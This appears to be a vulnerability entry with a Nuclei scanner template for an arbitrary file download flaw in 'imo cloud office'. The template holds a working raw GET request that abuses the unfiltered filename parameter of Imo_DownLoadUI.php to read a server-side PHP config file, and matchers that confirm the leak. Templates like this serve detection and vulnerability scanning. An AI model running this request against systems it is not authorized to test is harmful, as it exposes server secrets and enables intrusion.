漏洞描述
The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered.
imo-file-download: IMO - Arbitrary File Download
PoC代码[已公开]
id: imo-file-download
info:
name: IMO - Arbitrary File Download
author: ritikchaddha
severity: high
description: |
The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered.
reference:
- https://forum.butian.net/article/214
metadata:
max-request: 2
tags: imo,file-download,vuln
http:
- raw:
- |
GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<?php'
- '$bindInfo = array'
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- "filename=/home/www"
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210087f68fd3216ad7ab99e09e8e5b0e58cc5a19b071fa9675ea02f5a5a5952e17b2022100a67a9de9d98062a7c55848befe8a1dacdd0a8df90331f1349a840560dca027e2:922c64590222798bb761d5b6d8e72950